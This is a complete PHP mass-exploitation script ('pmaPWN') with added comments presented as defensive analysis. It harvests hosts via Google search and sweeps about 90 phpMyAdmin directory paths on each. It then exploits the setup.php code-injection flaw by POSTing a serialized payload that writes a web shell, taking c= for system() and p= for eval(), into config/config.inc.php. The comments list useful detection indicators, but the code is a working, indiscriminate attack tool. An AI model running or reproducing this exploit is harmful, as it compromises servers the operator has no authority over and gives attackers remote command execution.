
PMA BOTNET PHP SCRIPT

  1. <?php
     // Review (defensive analysis): mass scanner/exploiter for the phpMyAdmin
     // scripts/setup.php code-injection issue referenced in the banner below
     // (milw0rm 8921). Flow: read a Google "dork" from STDIN, harvest result
     // hosts from a Google Custom Search Engine, probe every host for the
     // directories in $list, and hand each phpMyAdmin hit to exploit_site().
     // Host artifacts: pmaPWN.log (append mode, working directory) and
     // exploitcookie.txt (see exploit()). Network indicators: the fixed
     // Firefox 2 user-agent strings, ~90 GETs for the paths below per host,
     // then GETs to scripts/setup.php and config/config.inc.php.
  2.  
     // Candidate phpMyAdmin directories probed on every host (each one is
     // appended to http://<host>).
  3. $list = array(
  4. '/phpmyadmin/',
  5. '/phpMyAdmin/',
  6. '/PMA/',
  7. '/pma/',
  8. '/admin/',
  9. '/dbadmin/',
  10. '/mysql/',
  11. '/myadmin/',
  12. '/phpmyadmin2/',
  13. '/phpMyAdmin2/',
  14. '/phpMyAdmin-2/',
  15. '/php-my-admin/',
  16. '/phpMyAdmin-2.2.3/',
  17. '/phpMyAdmin-2.2.6/',
  18. '/phpMyAdmin-2.5.1/',
  19. '/phpMyAdmin-2.5.4/',
  20. '/phpMyAdmin-2.5.5-rc1/',
  21. '/phpMyAdmin-2.5.5-rc2/',
  22. '/phpMyAdmin-2.5.5/',
  23. '/phpMyAdmin-2.5.5-pl1/',
  24. '/phpMyAdmin-2.5.6-rc1/',
  25. '/phpMyAdmin-2.5.6-rc2/',
  26. '/phpMyAdmin-2.5.6/',
  27. '/phpMyAdmin-2.5.7/',
  28. '/phpMyAdmin-2.5.7-pl1/',
  29. '/phpMyAdmin-2.6.0-alpha/',
  30. '/phpMyAdmin-2.6.0-alpha2/',
  31. '/phpMyAdmin-2.6.0-beta1/',
  32. '/phpMyAdmin-2.6.0-beta2/',
  33. '/phpMyAdmin-2.6.0-rc1/',
  34. '/phpMyAdmin-2.6.0-rc2/',
  35. '/phpMyAdmin-2.6.0-rc3/',
  36. '/phpMyAdmin-2.6.0/',
  37. '/phpMyAdmin-2.6.0-pl1/',
  38. '/phpMyAdmin-2.6.0-pl2/',
  39. '/phpMyAdmin-2.6.0-pl3/',
  40. '/phpMyAdmin-2.6.1-rc1/',
  41. '/phpMyAdmin-2.6.1-rc2/',
  42. '/phpMyAdmin-2.6.1/',
  43. '/phpMyAdmin-2.6.1-pl1/',
  44. '/phpMyAdmin-2.6.1-pl2/',
  45. '/phpMyAdmin-2.6.1-pl3/',
  46. '/phpMyAdmin-2.6.2-rc1/',
  47. '/phpMyAdmin-2.6.2-beta1/',
  48. '/phpMyAdmin-2.6.2-rc1/',
  49. '/phpMyAdmin-2.6.2/',
  50. '/phpMyAdmin-2.6.2-pl1/',
  51. '/phpMyAdmin-2.6.3/',
  52. '/phpMyAdmin-2.6.3-rc1/',
  53. '/phpMyAdmin-2.6.3/',
  54. '/phpMyAdmin-2.6.3-pl1/',
  55. '/phpMyAdmin-2.6.4-rc1/',
  56. '/phpMyAdmin-2.6.4-pl1/',
  57. '/phpMyAdmin-2.6.4-pl2/',
  58. '/phpMyAdmin-2.6.4-pl3/',
  59. '/phpMyAdmin-2.6.4-pl4/',
  60. '/phpMyAdmin-2.6.4/',
  61. '/phpMyAdmin-2.7.0-beta1/',
  62. '/phpMyAdmin-2.7.0-rc1/',
  63. '/phpMyAdmin-2.7.0-pl1/',
  64. '/phpMyAdmin-2.7.0-pl2/',
  65. '/phpMyAdmin-2.7.0/',
  66. '/phpMyAdmin-2.8.0-beta1/',
  67. '/phpMyAdmin-2.8.0-rc1/',
  68. '/phpMyAdmin-2.8.0-rc2/',
  69. '/phpMyAdmin-2.8.0/',
  70. '/phpMyAdmin-2.8.0.1/',
  71. '/phpMyAdmin-2.8.0.2/',
  72. '/phpMyAdmin-2.8.0.3/',
  73. '/phpMyAdmin-2.8.0.4/',
  74. '/phpMyAdmin-2.8.1-rc1/',
  75. '/phpMyAdmin-2.8.1/',
  76. '/phpMyAdmin-2.8.2/',
  77. '/sqlmanager/',
  78. '/mysqlmanager/',
  79. '/p/m/a/',
  80. '/PMA2005/',
  81. '/pma2005/',
  82. '/phpmanager/',
  83. '/php-myadmin/',
  84. '/phpmy-admin/',
  85. '/webadmin/',
  86. '/sqlweb/',
  87. '/websql/',
  88. '/webdb/',
  89. '/mysqladmin/',
  90. '/mysql-admin/',
  91. );
  92.  
      // Any command-line argument prints the banner and exits; the interactive
      // scan below only runs when the script is started without arguments.
  93. if($argc > 1) {
  94.     print "|****************************************************************|\n";
  95.     print "        pmaPWN.php - d3ck4, [email protected]\n";
  96.     print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  97.     print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
  98.     print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
  99.     print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
  100.     print "|****************************************************************|\n";
  101.     print "\n";
  102.     print "Usage: php $argv[0] \n";
  103.     exit;
  104. }
  105.  
  106.     print "|****************************************************************|\n";
  107.     print "        pmaPWN.php - d3ck4, [email protected]\n";
  108.     print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  109.     print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
  110.     print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
  111.     print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
  112.     print "|****************************************************************|\n";
  113.     print "\n";
           // Everything printed to the console is also appended to pmaPWN.log.
  114.     $Handlex = FOpen("pmaPWN.log", "a+");
  115.     FWrite($Handlex, "|****************************************************************|\n");
  116.     FWrite($Handlex, "        pmaPWN.php - d3ck4, [email protected]\n");
  117.     FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
  118.     FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
  119.     FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
  120.     FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
  121.     FWrite($Handlex, "|****************************************************************|\n\n");
           // The search term ("dork") is read from STDIN. The QUERY line is
           // cosmetic output only; no database is involved.
  122.     print "[-] Master, where you want to go today? \n";
  123.     print "[-] example dork: intitle:phpMyAdmin \n";
  124.     fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
  125.     $dork = trim(fgets(STDIN));
  126.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  127.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
           // Result harvesting: 10 pages x 100 results from a Google Custom Search
           // Engine (fixed cx= id); <h2><a href=...> targets are collected into
           // $res, one array per page.
  128.     for($i = 0; $i <= 900; $i+=100) {
  129.     $ch = curl_init();
  130.     curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
  131.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  132.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  133.     curl_setopt($ch, CURLOPT_HEADER, 1);
  134.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  135.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  136.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  137.     $pg = curl_exec($ch);
  138.     curl_close($ch);
  139.  
  140.     if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
  141.     }
  142.      
           // $total = number of harvested URLs ($res is nested per result page).
  143.     foreach($res as $key) {
  144.         foreach($key as $target) {
  145.             $total++;
  146.         }
  147.     }
  148.     print "[+] Done. $total rows return.\n";
  149.     FWrite($Handlex, "[+] Done. $total rows return.\n");
  150.     FClose($Handlex);
           // Per-host probe: only the host part of each result URL is kept and the
           // scheme is forced to http://; every path in $list is fetched in parallel
           // through curl_multi, with a 5 s pause before and after each host.
  151.     foreach($res as $key) {
  152.         foreach($key as $target) {
  153.             $Handlex = FOpen("pmaPWN.log", "a+");
  154.             $real = parse_url($target);
  155.             $url = "http://".$real['host'];
  156.             print "\n[-] Scanning phpMyAdmin on ".$url."\n";
  157.             FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
  158.             FClose($Handlex);
  159.             sleep(5);
  160.             $curlHandle = curl_multi_init();
  161.             for ($i = 0;$i < count($list); $i++)
  162.             $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
  163.             ExecHandle($curlHandle);
  164.             for ($i = 0;$i < count($list); $i++)
  165.             {          
  166.                 $text[$i] =  curl_multi_getcontent ($curl[$i]);
  167.                 //echo $url.$list[$i]."\n";
  168.                 $Handlex = FOpen("pmaPWN.log", "a+");
                       // phpMyAdmin fingerprint. PHP precedence: `and` binds tighter than
                       // `or`, so this reads as (title phpMyAdmin) OR (title "Access denied"
                       // AND body mentions phpMyAdmin).
  169.                 if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  170.                 print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
  171.                 print "\n[+] Testing vulnerable, wait sec..\n";
  172.                 FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
  173.                 FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
                           // The author treats this string as a sign the main page rendered
                           // without a login (hence the NO PASSWD message); presumably text
                           // from the phpMyAdmin landing page — not verified here.
  174.                     if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  175.                         print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
  176.                         FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
  177.                     }
  178.                 FClose($Handlex);
                       // Every fingerprinted path goes to exploit_site(), password or not.
  179.                 exploit_site($url.$list[$i]);
  180.                 }
  181.             }
  182.             for ($i = 0;$i < count($list); $i++)//remove the handles
  183.             curl_multi_remove_handle($curlHandle,$curl[$i]);
  184.             curl_multi_close($curlHandle);
  185.             sleep(5);
  186.         }
  187.     }
  188.  
  189. function addHandle(&$curlHandle,$url)
  190. {
       // Builds a plain GET easy handle for $url (no response headers, 10 s
       // timeout, body returned as a string), attaches it to the multi handle
       // and returns it so the caller can curl_multi_getcontent() it and
       // remove it from the multi handle later.
  191. $cURL = curl_init();
  192. curl_setopt($cURL, CURLOPT_URL, $url);
  193. curl_setopt($cURL, CURLOPT_HEADER, 0);
  194. curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  195. curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  196. curl_multi_add_handle($curlHandle,$cURL);
  197. return $cURL;
  198. }
  199. // Drives the multi handle to completion: curl_multi_exec() is called until
  200. // its running-handle count ($flag) drops to 0. This is a busy loop with no
       // curl_multi_select(), so it spins the CPU while transfers are in flight.
  201. function ExecHandle(&$curlHandle)
  202. {
  203. $flag=null;
  204. do {
  205. //fetch pages in parallel
  206. curl_multi_exec($curlHandle,$flag);
  207. } while ($flag > 0);
  208. }
  209.  
  210. function exploit_site($url) {
           // Pre-check for the setup-script injection: GETs $url."scripts/setup.php"
           // (must contain "200 OK" and "token") and $url."config/config.inc.php"
           // (must contain "200 OK"), then calls exploit(). Both responses include
           // headers, and the regexes match anywhere in headers+body. For
           // defenders: this pair of GETs right after the directory sweep is the
           // pre-exploitation signature, and the attack needs scripts/setup.php to
           // be reachable on the target. Results are echoed and appended to pmaPWN.log.
  211.     $ch = curl_init();
  212.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  213.     curl_setopt($ch, CURLOPT_HEADER, 1);
  214.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  215.     curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
  216.     $result = curl_exec($ch);
  217.     curl_close($ch);
  218.     $ch2 = curl_init();
  219.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  220.     curl_setopt($ch2, CURLOPT_HEADER, 1);
  221.     curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
  222.     curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
  223.     $result2 = curl_exec($ch2);
  224.     curl_close($ch2);
  225.     //print $url;
  226.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  227.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  228.         print "\n[+] Exploiting, wait sec..\n";
  229.         $Handlex = FOpen("pmaPWN.log", "a+");
  230.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  231.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  232.         FClose($Handlex);
  233.         exploit($url);
  234.     }
  235.     else {
  236.         $Handlex = FOpen("pmaPWN.log", "a+");
  237.         print "\n[-] Shit! no luck.. not vulnerable\n";
  238.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  239.         FClose($Handlex);
  240.     }
  241. }
  242.  
  243.     function exploit($w00t) {
               // Second stage (called from exploit_site). Step 1: GET scripts/setup.php
               // through a cookie jar (exploitcookie.txt) to obtain a session cookie and
               // the form token. Step 2: POST action=save with a serialized "Servers"
               // configuration whose host field carries PHP code; setup.php writes it
               // into config/config.inc.php, which is then reported as a web shell
               // taking c= (system) and p= (eval) query parameters. Indicators for
               // defenders: a POST to scripts/setup.php with action=save, a modified
               // config/config.inc.php, and requests to it with c= or p= parameters.
               // TLS peer verification is disabled on both requests. The failure branch
               // returns before FClose() and before the cookie file is unlinked, so
               // exploitcookie.txt stays in the working directory after a miss.
  244.         $Handlex = FOpen("pmaPWN.log", "a+");
  245.         $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  246.         //first get cookie + token
  247.         $curl = curl_init();
  248.         curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
  249.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  250.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  251.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  252.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  253.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  254.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);      
  255.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  256.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  257.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  258.         $result = curl_exec($curl);
  259.         curl_close($curl);
               // This if has an empty body (trailing ";"): the regex runs here and
               // its second captured value is read unconditionally below.
  260.         if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
  261.          
  262.         $token = $matches[1][1];
  263.         if ($token != '') {
  264.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  265.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
               // URL-encoded, PHP-serialized phpMyAdmin configuration. The 136-byte
               // "host" value closes the quoted string in the generated config file,
               // appends the c=/p= shell code and ends with // to comment out the rest.
  266.         $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  267.         print "\n[+] Sending evil payload mwahaha.. \n";
  268.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
               // Step 2: POST the payload with the same cookie jar and the target as
               // Referer. Host verification is set differently here (3) than in the
               // first request (false); peer verification is off in both.
  269.         $curl = curl_init();
  270.         curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
  271.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  272.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  273.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  274.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  275.         curl_setopt($curl, CURLOPT_POST, true);
  276.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  277.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  278.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  279.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  280.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  281.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  282.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  283.         $result = curl_exec($curl);
  284.         curl_close($curl);
  285.          
               // Success is assumed, not checked: $result of the POST is never inspected.
  286.         print "\n[!] w00t! w00t! You should now have shell here";
  287.         print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
  288.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  289.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  290.         FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
  291.          
  292.         }
  293.         else {
  294.             print "\n[!] Shit! no luck.. not vulnerable\n";
  295.             FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  296.             return false;
  297.         }
  298.         FClose($Handlex);
               // Cookie-jar cleanup; only reached on the success path.
  299.         if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
  300.         //exit();
  301.     }
  302.  
  303. ?>